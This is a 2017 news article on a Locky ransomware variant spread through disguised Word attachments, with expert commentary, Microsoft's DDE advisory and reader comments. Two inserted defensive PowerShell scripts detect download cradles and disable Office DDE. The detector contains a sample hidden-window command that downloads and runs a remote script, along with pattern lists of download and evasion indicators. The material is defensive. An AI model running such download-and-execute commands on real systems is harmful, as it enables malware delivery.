11/10/2017
03:10 PM
New Locky Ransomware Takes Another Turn

A newly discovered strain of Locky ransomware is masquerading as legitimate Microsoft Word documents.

Another evolution of Locky ransomware is spreading through malicious attachments disguised as legitimate documents from productivity applications such as Microsoft Word and LibreOffice.

Researchers at Avira Virus Lab detected the ransomware earlier this week. This form of Locky has the same ".asasin" extension as a strain PhishMe picked up in October. However, it's crafted to manipulate users with a reportedly "protected document" disguised as this:

(Image: Avira)

Users who double-click the image prompt a series of actions, which ultimately result in their files being encrypted under the ".asasin" file extension name. Multiple other files, with payment details, are written onto the disk.

Behind the image from the Word document, researchers saw a LNK file, otherwise known as a Windows shortcut. They realized the shortcut is intended to run a PowerShell script, which downloads another PowerShell script from an embedded link and runs it.

The second script connects to the Internet and downloads a Windows executable file, which includes several stages of code obfuscation and misleading data to trick victims and analysts into thinking the file is clean and from a legitimate Microsoft application.

Once it's on the victim's machine, the malware collects information about the operating system and sends it, encrypted, to the command-and-control server and retrieves the encryption key.
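To make the first two stages of that chain concrete from the defender's side, here is an added example in PowerShell (not code from the article, Avira or PhishMe): a detection pass over Sysmon-style process-creation records that flags PowerShell launched from a double-clicked shortcut when its command line fetches and runs remote content. The records, field names, host names, users, paths and URLs are constructed for this example, and the assumption that a shortcut opened by the user runs as a child of explorer.exe is mine, not the article's.

```powershell
# Added example, not code from the article, Avira or PhishMe. Flags Sysmon-style
# process-creation records where PowerShell is launched from a double-clicked
# shortcut and its command line fetches and runs remote content, i.e. the first two
# stages the article describes. All records below are constructed; the field names
# mirror Sysmon event ID 1 but the hosts, users, paths and URLs are invented.
# Assumption: a shortcut opened by the user is launched by explorer.exe.

# Command-line fragments that fetch remote content.
$DownloadPatterns = @(
    'DownloadString', 'DownloadFile', 'Net\.WebClient', 'Invoke-WebRequest', '\biwr\b',
    'Invoke-RestMethod', 'Start-BitsTransfer', 'https?://'
)
# Command-line fragments that hide the window, skip policy, or obscure the payload.
$EvasionPatterns = @(
    '-w(indowstyle)?\s+hidden', '-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}',
    '\bIEX\b', 'Invoke-Expression', '-nop\b', '-noprofile', 'bypass'
)

function Test-SuspiciousPowerShellLaunch {
    param([Parameter(Mandatory, ValueFromPipeline)][pscustomobject]$Event)
    process {
        if ($Event.Image -notmatch '\\powershell(_ise)?\.exe$') { return }
        $fromExplorer = $Event.ParentImage -match '\\explorer\.exe$'
        $reasons = @()
        if ($fromExplorer) {
            $reasons += 'spawned by explorer.exe (consistent with a double-clicked shortcut)'
        }
        $dl = @($DownloadPatterns | Where-Object { $Event.CommandLine -match $_ })
        if ($dl.Count) { $reasons += "download indicator(s): $($dl -join ', ')" }
        $ev = @($EvasionPatterns | Where-Object { $Event.CommandLine -match $_ })
        if ($ev.Count) { $reasons += "evasion indicator(s): $($ev -join ', ')" }
        # A download indicator plus at least one other signal is required; explorer.exe
        # starting an interactive PowerShell with no network activity is routine.
        if ($dl.Count -eq 0 -or $reasons.Count -lt 2) { return }
        $severity = 'medium'
        if ($fromExplorer) { $severity = 'high' }
        [pscustomobject]@{
            Time     = $Event.UtcTime
            Host     = $Event.Computer
            User     = $Event.User
            Severity = $severity
            Reasons  = $reasons -join '; '
            Command  = $Event.CommandLine
        }
    }
}

# Constructed sample records (not real telemetry).
$SampleEvents = @(
    [pscustomobject]@{
        UtcTime = '2017-11-08 09:12:03'; Computer = 'WS-017'; User = 'CORP\jdoe'
        ParentImage = 'C:\Windows\explorer.exe'
        Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = 'powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(''http://stage.example.invalid/s.ps1'')"'
    },
    [pscustomobject]@{
        # Interactive shell opened from the Start menu: explorer.exe parent, no download.
        UtcTime = '2017-11-08 09:30:44'; Computer = 'WS-017'; User = 'CORP\jdoe'
        ParentImage = 'C:\Windows\explorer.exe'
        Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = 'powershell.exe'
    },
    [pscustomobject]@{
        # Scheduled maintenance script: policy bypass but no remote fetch.
        UtcTime = '2017-11-08 10:02:19'; Computer = 'SRV-02'; User = 'CORP\svc_deploy'
        ParentImage = 'C:\Windows\System32\svchost.exe'
        Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = 'powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\patch.ps1'
    },
    [pscustomobject]@{
        UtcTime = '2017-11-08 10:15:00'; Computer = 'WS-021'; User = 'CORP\asmith'
        ParentImage = 'C:\Windows\explorer.exe'
        Image = 'C:\Windows\System32\notepad.exe'
        CommandLine = 'notepad.exe C:\Users\asmith\notes.txt'
    }
)

# Only the first record is reported, at severity "high".
$SampleEvents | Test-SuspiciousPowerShellLaunch | Format-List
```

The two-signal rule is the point of the design: explorer.exe launching PowerShell is routine, and a policy bypass in a scheduled script is routine, but a hidden-window PowerShell spawned from a shortcut that pulls a script over HTTP matches the delivery path the article describes and deserves a look. In production the records would come from Sysmon or EDR telemetry rather than the inline array.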

"We are seeing a rapid evolution in the way Locky is delivered," says Brendan Griffin, threat intelligence manager and malware analyst at PhishMe. "Locky stays the same, but the delivery techniques are where we've really seen the most change."

Evolution of Locky: What does it mean?

Ransomware is a growing problem for many organizations, and Locky is a common attack to watch.

"Locky has been one of the most popular malware libraries for a long time," says John Pironti, president of IP Architects. "It has been maturing, and that doesn't surprise me because it has been successful in financial gain."

It's common to see adversaries refresh and renew old approaches to see which is most effective, he continues. Attackers will slightly change their links or scripting to initiate activities to get to the same payload. The idea is to avoid detection and trick more users.

It's "misleading" to call this recent finding a new strain of Locky, Griffin adds. The ".asasin" strain, which PhishMe also detected, uses a more robust and more verbose script-based delivery than other forms of Locky seen in the past. It collects basic information off the machine, nothing personally identifiable. This is the same malware arriving on a different path.

"We've seen people embed scripts inside of Word documents, Excel links, things like that as a way to generate code and scripts that can grab more malware packages," Pironti says. People are more likely to open an attachment, the vector in Avira's finding, than they are to click a link.

"We spend so much time telling people not to click links … and not nearly as much time telling them not to click attachments," Pironti adds. Many employees click attachments all day as part of their jobs; to them, Word or Excel files aren't as suspicious as a potentially phishy link.

He notes that the ".asasin" extension is amusing. "They want to work off fear and force people to pay," he says.

This evolution also underscores how attackers often revert to simple techniques, Griffin adds. They're taking advantage of the fact that phishing emails, while basic, work. "Why would they choose a really complex, sophisticated, unreliable means of delivering malware?" he says.

Defending against fake applications

Griffin points out that this is a clear example of abuse of Microsoft's Dynamic Data Exchange (DDE), a protocol on which Microsoft just published guidance for users.

Earlier this week, Microsoft published an advisory, following activity by Fancy Bear, which abused DDE fields to distribute malware. Microsoft is not planning to issue a patch but has provided steps for administrators to disable DDE, a protocol for transferring data between applications. If exploited, an attacker could assume control of an affected system.

Admins can turn off DDE by creating and setting registry entries for Microsoft Office based on the applications installed on the system. After this, data will no longer update automatically between applications, which could be problematic for people who rely on data feeds to update Excel. Microsoft warns doing this incorrectly could cause serious problems that would require reinstallation of the operating system.
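As an added example (not the article's or Microsoft's own code), the following PowerShell applies the registry change described above for the current user, with a -WhatIf preview and a read-back check, since the article warns that registry mistakes are costly. It assumes per-user Office settings live under HKCU:\Software\Microsoft\Office\<version>\<App>\Options, and the value names DontUpdateLinks (Word, Excel) and DDEAllowed / DDECleaned (Excel) follow Microsoft's guidance; confirm them against the current advisory before deploying. The -SkipExcel switch leaves Excel untouched for users who depend on DDE data feeds.

```powershell
# Added example, not code from the article or from Microsoft. Disables DDE link
# updating in Word and Excel for the current user by writing the registry values
# Microsoft's guidance describes, previews with -WhatIf, and reads the values back.
# Assumptions: per-user Office settings live under
# HKCU:\Software\Microsoft\Office\<version>\<App>\Options (version keys such as
# 15.0 or 16.0); value names DontUpdateLinks (Word, Excel) and DDEAllowed /
# DDECleaned (Excel) follow Microsoft's advisory. Confirm them against the current
# advisory before deploying.

$OfficeRoot = 'HKCU:\Software\Microsoft\Office'

function Get-OfficeVersion {
    # Version subkeys look like "14.0", "15.0", "16.0"; skip keys such as "Common".
    Get-ChildItem -Path $OfficeRoot -ErrorAction SilentlyContinue |
        Where-Object { $_.PSChildName -match '^\d+\.\d+$' } |
        Select-Object -ExpandProperty PSChildName
}

function Set-DwordValue {
    [CmdletBinding(SupportsShouldProcess = $true)]
    param(
        [Parameter(Mandatory)][string]$Path,
        [Parameter(Mandatory)][string]$Name,
        [Parameter(Mandatory)][int]$Value
    )
    if (-not (Test-Path -Path $Path)) {
        # The Options subkey only appears after the application has been run once,
        # so create it instead of failing on a freshly imaged machine.
        New-Item -Path $Path -Force | Out-Null
    }
    if ($PSCmdlet.ShouldProcess("$Path\$Name", "Set DWORD to $Value")) {
        New-ItemProperty -Path $Path -Name $Name -Value $Value -PropertyType DWord -Force | Out-Null
    }
}

function Disable-OfficeDde {
    [CmdletBinding(SupportsShouldProcess = $true)]
    param(
        # Leave Excel alone for users whose workbooks depend on live DDE data feeds,
        # which stop updating once DDE is disabled.
        [switch]$SkipExcel
    )
    foreach ($ver in Get-OfficeVersion) {
        $word = "$OfficeRoot\$ver\Word"
        if (Test-Path -Path $word) {
            Set-DwordValue -Path "$word\Options" -Name 'DontUpdateLinks' -Value 1
            # Outlook uses Word as its mail editor; that setting lives under WordMail.
            Set-DwordValue -Path "$word\Options\WordMail" -Name 'DontUpdateLinks' -Value 1
        }
        $excel = "$OfficeRoot\$ver\Excel"
        if (-not $SkipExcel -and (Test-Path -Path $excel)) {
            Set-DwordValue -Path "$excel\Options" -Name 'DontUpdateLinks' -Value 1
            Set-DwordValue -Path "$excel\Options" -Name 'DDEAllowed'      -Value 0
            Set-DwordValue -Path "$excel\Options" -Name 'DDECleaned'      -Value 1
        }
    }
}

function Get-OfficeDdeState {
    # Read every value back so the change can be verified, or audited later,
    # rather than trusting that the writes succeeded silently.
    foreach ($ver in Get-OfficeVersion) {
        foreach ($app in 'Word', 'Excel') {
            $opts = "$OfficeRoot\$ver\$app\Options"
            if (-not (Test-Path -Path $opts)) { continue }
            $item  = Get-ItemProperty -Path $opts -ErrorAction SilentlyContinue
            $state = 'not set'
            if ($null -ne $item.DontUpdateLinks) { $state = $item.DontUpdateLinks }
            [pscustomobject]@{ Version = $ver; Application = $app; DontUpdateLinks = $state }
        }
    }
}

# Preview first, then apply and verify.
Disable-OfficeDde -WhatIf
Disable-OfficeDde
Get-OfficeDdeState | Format-Table -AutoSize
```

Because the keys live in HKCU, the script only hardens the account it runs under; for a fleet, push the same values with Group Policy Preferences or a logon script so every user profile gets them, and keep the read-back function as a compliance check.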


Kelly Sheridan is Associate Editor at Dark Reading. She started her career in business tech journalism at Insurance & Technology and most recently reported for InformationWeek, where she covered Microsoft and business IT. Sheridan earned her BA at Villanova University.

Comments
DaraSingh
User Rank: Apprentice
11/11/2017 | 9:28:51 AM
Locky Ransomware attacks
This attack is of a very dangerous kind. If your file is locked with Locky then you have lost your data and there is no way to recover; the only way is if you have a backup of your data, then OK.

I faced this situation three times and found that if it enters your network then the only option is to identify the system and remove it immediately from the network, else your network PCs' data are going into the dustbin. Sometimes it also encrypts video and audio files, depending on the programs' file formats that are going to be affected.

The best way is to use your network safely with proper antivirus and don't install unnecessary programs and adware which have loopholes in their design architecture. If you are a tech giant and want to face such a problem then you can try Locky..... GOOD luck and happy reading.

kenomouth64
User Rank: Apprentice
11/13/2017 | 8:52:08 AM
Possible Improvised Solution
  • At my company we supported 200 clients' IT infrastructure. Well, at least 1 client a week was getting infected with Locky; luckily we had backups in each case. However, it was still concerning that Locky was slipping past the security controls in place. So we developed a "programmatic block" which prevents any files from writing to the appdata folder.
  • So, we figured out that most strains of Locky will write to the appdata folder for install by default. So we just prevent anything from writing to this folder. It has created a few issues but we ironed those out. It has been working for the clients for a year now. No new infections since it was implemented.